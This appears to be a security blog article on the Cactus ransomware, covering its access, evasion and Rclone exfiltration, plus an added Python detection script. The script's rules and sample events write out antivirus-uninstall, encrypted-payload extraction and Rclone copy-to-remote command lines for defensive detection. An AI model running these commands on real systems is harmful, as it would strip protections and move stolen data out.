The cyber attack landscape has a new entry: a ransomware strain that encrypts its own executable to evade antivirus detection. This strain is currently one of the main actors in double-extortion attacks, where a ransom is demanded in exchange for not disclosing stolen information.
Clearly, cybercrime is constantly evolving, leveraging sophisticated technologies and attack techniques. Ransomware, in particular, is forcing companies to deal with ever-new and sometimes unknown threats.
Table of Contents:
The New Cactus Ransomware: What We Know
The main characteristics of ransomware
How does Cactus ransomware spread?
Why is Cactus a unique ransomware?
The main actions that allow you to protect yourself from threats
The New Cactus Ransomware: What We Know
According to preliminary information, Cactus is a new ransomware strain that uses cutting-edge techniques to steal data and encrypt files, with the peculiarity of using a different method to avoid detection.
The ransomware takes its name from the ransom note file it drops, cAcTuS.readme.txt.
The main characteristics of ransomware
The history of Cactus is very recent: it is a threat that has been active since March 2023. The attack exploits vulnerabilities in Fortinet VPN appliances with the aim of penetrating the networks of large commercial entities.
In all cases observed by Kroll, the attacker gained access through the VPN service and established an SSH backdoor, reachable from a command and control (C2) server, to maintain persistent access to the devices. Interestingly, once inside the network, the cybercriminal performs reconnaissance with SoftPerfect Network Scanner (netscan) to identify the most attractive targets.
Another distinctive feature of Cactus is the use of encryption to protect the ransomware's own code. Two components are involved: a 7-Zip archive that holds the encrypted payload and a batch script that unpacks it; the same script uses msiexec to remove antivirus protection, so the malware can then act freely to steal data. For the exfiltration itself, Cactus uses Rclone, which transfers the files to cloud storage.
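The tooling chain just described (netscan reconnaissance, msiexec launched from a batch script to remove antivirus, a password-protected 7-Zip extraction, and Rclone transfers) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the original post or from any vendor: a small rule set run over constructed, Sysmon-style process-creation events. The event field names, the rule patterns, the hostnames, paths, product code and password in the sample data are all assumptions made for illustration, not published indicators.

```python
"""Hypothetical detection pass over constructed process-creation events.

Each rule matches one stage of the chain described in the text. A host
that shows several stages is scored higher than a host that shows one,
because a single msiexec uninstall or 7-Zip extraction is routine on
its own. Field names are Sysmon-style assumptions, not a real schema.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Event:
    host: str
    parent: str   # parent process image
    image: str    # process image
    cmdline: str  # full command line


# (rule name, parent image pattern or None, image pattern, command-line pattern)
# Patterns are illustrative heuristics chosen for this example.
RULES: List[Tuple[str, Optional[str], str, str]] = [
    # network scanner run anywhere in the environment
    ("netscan-recon", None, r"netscan\.exe$", r"."),
    # msiexec uninstall (/x or /uninstall) started from a batch script (cmd.exe parent)
    ("msiexec-uninstall", r"cmd\.exe$", r"msiexec\.exe$", r"/(x|uninstall)\b"),
    # 7-Zip extract (x/e) of a password-protected archive (-p<password>)
    ("7zip-encrypted-extract", None, r"7z[ag]?\.exe$", r"^\S+\s+[xe]\s.*-p\S+"),
    # rclone copy/sync/move, i.e. bulk transfer to a configured remote
    ("rclone-transfer", None, r"rclone(\.exe)?$", r"\b(copy|sync|move)\b"),
]


def classify(ev: Event) -> List[str]:
    """Return the names of all rules that match a single event."""
    hits = []
    for name, parent_re, img_re, cmd_re in RULES:
        if parent_re and not re.search(parent_re, ev.parent, re.I):
            continue
        if re.search(img_re, ev.image, re.I) and re.search(cmd_re, ev.cmdline, re.I):
            hits.append(name)
    return hits


def score_hosts(events: List[Event]) -> Dict[str, Tuple[str, List[str]]]:
    """Group distinct matched stages per host and assign a severity:
    three or more stages -> high, two -> medium, one -> low."""
    stages: Dict[str, Set[str]] = {}
    for ev in events:
        for h in classify(ev):
            stages.setdefault(ev.host, set()).add(h)
    result: Dict[str, Tuple[str, List[str]]] = {}
    for host, hits in stages.items():
        sev = "high" if len(hits) >= 3 else "medium" if len(hits) == 2 else "low"
        result[host] = (sev, sorted(hits))
    return result


# Constructed sample telemetry. ws-01 shows the full chain; ws-02 shows
# ordinary administrative activity that must not be flagged.
SAMPLE_EVENTS = [
    Event("ws-01", r"C:\Windows\System32\cmd.exe", r"C:\Tools\netscan.exe",
          "netscan.exe"),
    Event("ws-01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
          "msiexec.exe /x {PLACEHOLDER-PRODUCT-CODE} /qn"),
    Event("ws-01", r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\7z.exe",
          r"7z.exe x payload.7z -pEXAMPLEPASS -oC:\ProgramData"),
    Event("ws-01", r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\rclone.exe",
          r"rclone.exe copy C:\Finance remote:bucket"),
    Event("ws-02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
          "msiexec.exe /i setup.msi /qn"),
    Event("ws-02", r"C:\Windows\explorer.exe", r"C:\Program Files\7-Zip\7z.exe",
          r"7z.exe a backup.7z C:\docs"),
]


if __name__ == "__main__":
    for host, (sev, hits) in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {sev} ({', '.join(hits)})")
```

Running the block prints only ws-01, scored high with all four stages; ws-02 produces no hits because an msiexec install from Explorer and a 7-Zip archive creation match none of the rules. The per-host aggregation is the point: each rule alone is noisy, but the combination of reconnaissance, antivirus removal, payload extraction and bulk cloud transfer on one host is what the text describes.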
Cactus, the new ransomware that eludes antivirus